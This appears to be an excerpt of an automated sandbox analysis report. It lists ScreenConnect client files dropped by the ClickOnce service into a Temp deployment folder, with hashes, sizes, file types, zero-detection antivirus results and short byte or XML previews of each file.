                                                                                                                                                                                                                                        SSDEEP:1536:KQZMEtZ8j8Mk6Y6lXQiA1FBwtc5QFVIl1h5FYb8h:Vb2jbfZUFmMQFVQPh
                                                                                                                                                                                                                                        MD5:26AE3ECD5B370434E3147A4F7638E408
                                                                                                                                                                                                                                        SHA1:26684D1CFA1DBE03E00B87FE0998DBDD324B97E1
                                                                                                                                                                                                                                        SHA-256:31B75F440F94BF6831EC57DC95F2FE09B88F16FA0356F99B72B925D4308126EB
                                                                                                                                                                                                                                        SHA-512:2811A08546A79603499D146061CAB25C6ECBB9DDBEA389DECD85112009140C7B9379A5A708ABF41C9C1C37D853499218B233929EBAEC4679282B48ED9EEE51CA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............" ..0.............."... ...@....... ....................................@..................................!..O....@.......................`.......!..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......po..,.................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....f...s....%.,...(...+*vs....%.}P.........s....(....*....0..&........s....}.....s....}...........}....s.......}R......{R...(#.....}Q.....}.....(....&.(&..........s....o.....(&...~-...%-.&~+.....g...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s:...}....... ..6........s....s:...}.....($..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll.genman

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                        Entropy (8bit):5.085064362578612
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0Ah+vSkcyMDcbEMDcuMDcVSkcf5bdTo:3FYZ8h9o9gI0AhCHMDTMD3MDGAXTo
                                                                                                                                                                                                                                        MD5:A76A11959003296D5D51977FCCA1A318
                                                                                                                                                                                                                                        SHA1:80D5EDD082ECC84E1989A425475A21084D3007B3
                                                                                                                                                                                                                                        SHA-256:6728343B086A6BDA1D771D9DAC1C894A4D26F38D3CD4DFCC1BE31D99F6C89494
                                                                                                                                                                                                                                        SHA-512:17738FDD0F29C7C6CB7EB8EF7665623ABB6E17DAB430A7840BA416BA93E7BB7D8ECC256919A57944A9A0CA52954DAFB9CCB4D192A5C1860C491E04789F86A310
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95512
                                                                                                                                                                                                                                        Entropy (8bit):6.50477752737346
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ig1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgsU0HMF7aw:zhbNDxZGXfdHrX7rAc6myJkgsU0H2B
                                                                                                                                                                                                                                        MD5:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        SHA1:333A207282B5127674560B2F290D890214FCFA7A
                                                                                                                                                                                                                                        SHA-256:906075E5A4CEDF4793EF18C4C8DA01B0E8798E9EEBCBC2287BA1F470CAFBDAF5
                                                                                                                                                                                                                                        SHA-512:80FDA5639D41F924C6A0C2E1D798A5433DD1C6043C6E9A03EB1CE0CEF7D75339676743E7BEF4A4C8D548B9FE293CC591822B4FEB77FCF61F84EAD4C13EDCBC6C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@..................................o....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):549888
                                                                                                                                                                                                                                        Entropy (8bit):6.035813011819646
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:qL2DLhOnlTQatfpw7TkJ9/KeZBFR/Zw7VTcWt5jv8jyEzR39GBCquq1MSRq/sree:qLMhOeM52aBFcTbkdqRR6EX
                                                                                                                                                                                                                                        MD5:DA6B59FA5636B53C758E796A3226ADB7
                                                                                                                                                                                                                                        SHA1:3B6DC82FFD7097455E703C1FC729A1D0F8815898
                                                                                                                                                                                                                                        SHA-256:CCE6DC73141C3E41E026131967AF21BEF625F903FA275913598A55B4D4997678
                                                                                                                                                                                                                                        SHA-512:760B5A348D8E4CA1DEC36420F2C1B979F715650EA691235C2053D5DDCE5228D0652C9FF7A420717A1290F001C8DDB88C83ABC65FFE892DAFF6761B12C0588CBA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q............" ..0..\..........Bv... ........... ...............................-....@..................................u..O.......t...........................Pu..8............................................ ............... ..H............text...PZ... ...\.................. ..`.rsrc...t............^..............@..@.reloc...............b..............@..B................!v......H........C..41...................t........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll.genman

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                        Entropy (8bit):5.130383203139021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0A5vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A/GVETDTo
                                                                                                                                                                                                                                        MD5:AE2F030FA7A72B3B147D9699F326D545
                                                                                                                                                                                                                                        SHA1:A918B54C0AD8216B1E61D2C0BA35239B6BB5CB74
                                                                                                                                                                                                                                        SHA-256:0884F127D1A5260AC40B7CACEA51F9A994B4E3BEAB6E5C75E848CA3000FEADF9
                                                                                                                                                                                                                                        SHA-512:06857692C0283FA76512060E56D711E87B789A305B3720B0255AF920004DBFAC6C782FCD12E85771A918A2FFEDC55A3723F9D616D2A21F3042E158AC25889504
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1726976
                                                                                                                                                                                                                                        Entropy (8bit):6.640049744810174
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:cOgsFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:FgsJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                        MD5:7E3BCFD89F41083DD30725A9F9C4D0C9
                                                                                                                                                                                                                                        SHA1:B68092FDCF113381B31861C79394AFA0E235252E
                                                                                                                                                                                                                                        SHA-256:FE8C56F3CD7D2EF529DF28756F8C9F961F0DDC81B1F1FBEAC7CE69011AD06E74
                                                                                                                                                                                                                                        SHA-512:C93D0EFD94CD4A34C30816B0371A698187AFFBFA9D74F91E93C48EC69CB7BD94A03ECCC0D6039013ABA7BF6EA16B9ADF996F40562208AEF752B93CCE6EA7FCA3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^............" ..0..R...........q... ........... ....................................@..................................p..O.......|............................p..8............................................ ............... ..H............text....Q... ...R.................. ..`.rsrc...|............T..............@..@.reloc...............X..............@..B.................p......H.......................d...0....o........................................(+...*^.(+..........%...}....*:.(+.....}....*:.(+.....}....*:.(+.....}....*..s,...*..s-...*:.(......(/...*..{0...*"..}0...*J.(1........(2...&*:.(......(3...*..{4...*"..}4...*.0..(........(5......+.............(2...&..X....i2.*v.(.....s6...}.....s7...}....*v.{.....r...p(...+.....o9....*.0...........o:....+..o;......(...+&.o....-....,..o......*..........."........{..........o<...&.......(.....*....0..L...

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll.genman

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                        Entropy (8bit):5.057000083875677
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0A1vSkcyMDcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AzHMDGQAXRTFgTo
                                                                                                                                                                                                                                        MD5:979E83C183434FDF0840E13A1BEB2200
                                                                                                                                                                                                                                        SHA1:5EF4A368EA8FF239AEACEFDD109F799F6EA58567
                                                                                                                                                                                                                                        SHA-256:50FE4C046184A3BE4A888C14564F56816BDD47AD3B7C580E0EF8B9FAF1101813
                                                                                                                                                                                                                                        SHA-512:316F0A82D8BE824D8146A69CCE201F5E4D959DB9C56EF85CA5D7BBDF79E19116F8C179CDC2B59ECEDE03B29B6E4EF695A0C792EE207E24295F7C87D1B5FD0428
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61208
                                                                                                                                                                                                                                        Entropy (8bit):6.323071111905421
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6yot+ktY7OUZXPGQDvmDtyQXIE+TCBtIfXWbJe79o7p:6yYtxURPGZyQVwWem
                                                                                                                                                                                                                                        MD5:9191DE53DBFFC88DDBF49B88CC124B74
                                                                                                                                                                                                                                        SHA1:BAD54B6C1EDB1D37158BF3EEA16B0253452F9445
                                                                                                                                                                                                                                        SHA-256:7205B27FCEB210388597BEDD40786809EEC51163225ED6BBA9E7BC0FBB6B8A65
                                                                                                                                                                                                                                        SHA-512:341FA333A23737D6A79A3C98D317E30EEC7BD23C5DD42742603EB900F5DF654ADEAD2CD4B82132B6F614755D5ECBC0E4D7CBCA36240E93CCAB1042EF51C28417
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............"...0.............^.... ........@.. ....................... ......;.....@.....................................O....... ................)..........P...8............................................ ............... ..H............text...d.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................=.......H........S................................................................(....*^.(.......b...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s"...o(...%~....o)...}......(....o*...o+....(,.....A...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602392
                                                                                                                                                                                                                                        Entropy (8bit):6.179677334154197
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:ayB4P+n4htgqvqURfRa5CgSM4ZrvR/YKcSAwqrKyKKj414Sc4q2/R4IEyCui5AS2:FB4KsgqyUuiXrveKtCa3CNax
                                                                                                                                                                                                                                        MD5:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        SHA1:AC5F3D13A4084D53D3E0CCE104A9284D998E2B1A
                                                                                                                                                                                                                                        SHA-256:C59947E7D0477E143B3EE9A63F60096F24A07AC4FC018F061473F6D548CBECA4
                                                                                                                                                                                                                                        SHA-512:48716CAF09228AF3D9CD34772AC64CCFFE9FC292EF6CDCC926E885FC10A1BF97B2E889A5F8577CD3C0E55FF00EBD436112ABC1D9B12F57C23B43CC29A1B58172
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u..........."...0.................. ... ....@.. .......................`......1c....@.................................Q...O.... ...................)...@..........8............................................ ............... ..H............text...x.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........I..<...................(.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe.genman

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                        Entropy (8bit):5.025603000423177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AEHMDAXQ3MDTMDRGTDBTo:1YiW4ALsvcx
                                                                                                                                                                                                                                        MD5:F8EE5554BAB7AE67A2373703243F634E
                                                                                                                                                                                                                                        SHA1:D30490278145AB14366D55959945E7DB1A444FFA
                                                                                                                                                                                                                                        SHA-256:33578584A89CC841B992603039410B1B93907CBFDF0FA6BD0C6E12680A804C02
                                                                                                                                                                                                                                        SHA-512:552087971AD984B4FC36F69E68F46977C0E31E6DD7DF249332D2783F807254DF46C8F8BF7F7F18A48F606CF5C09026620770DF63DC91A636F842F950C22EA174
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                        Entropy (8bit):5.955723401117127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zeNAJBQ4aCaX/f68nEuX9/v2bTX9FX9R/QPIYM7Y7:z66buX9uTX9FX9R/QPIN07
                                                                                                                                                                                                                                        MD5:4739CCEA24F7615F4B5186F8DB9AA006
                                                                                                                                                                                                                                        SHA1:66161FDE108CD3C27770559B5408F08F0EFA0C64
                                                                                                                                                                                                                                        SHA-256:4C5AFFF7D1CED73D787E691D8F1E82D26E4BFF70E2D9001EF220D66C3BC2D041
                                                                                                                                                                                                                                        SHA-512:0EE5B62138BAFDF5252F304963C4F9F3A6D56E3F3C1C2CF209B284FFE5B3F4424BD09DC42F6EE79307258DE74BA0C326C81D0958402CA979602B95409D707900
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.4.2.9083" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):81688
                                                                                                                                                                                                                                        Entropy (8bit):5.8621631504225675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Wty/l44QzbkI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7/T7r3:VdxukLdjTP
                                                                                                                                                                                                                                        MD5:0EE5B092F5EFFA84DB5A1CE93417D8C1
                                                                                                                                                                                                                                        SHA1:21FF86BB144960D36628D649EB1485A646987E02
                                                                                                                                                                                                                                        SHA-256:5859F53DCB98ECB2C427E56BB95A71A1DA8B9937128BF49C82EC17EBE948EA80
                                                                                                                                                                                                                                        SHA-512:A6F6DC72AA5C4C8C9E7B0D03BB710D5B44F90B19EB44BC31DC6B020E685E4F985622A978E775CF892C52CAA679ED78E4ECF0BC03E5D8152A54C1ED8FA88BEBC3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
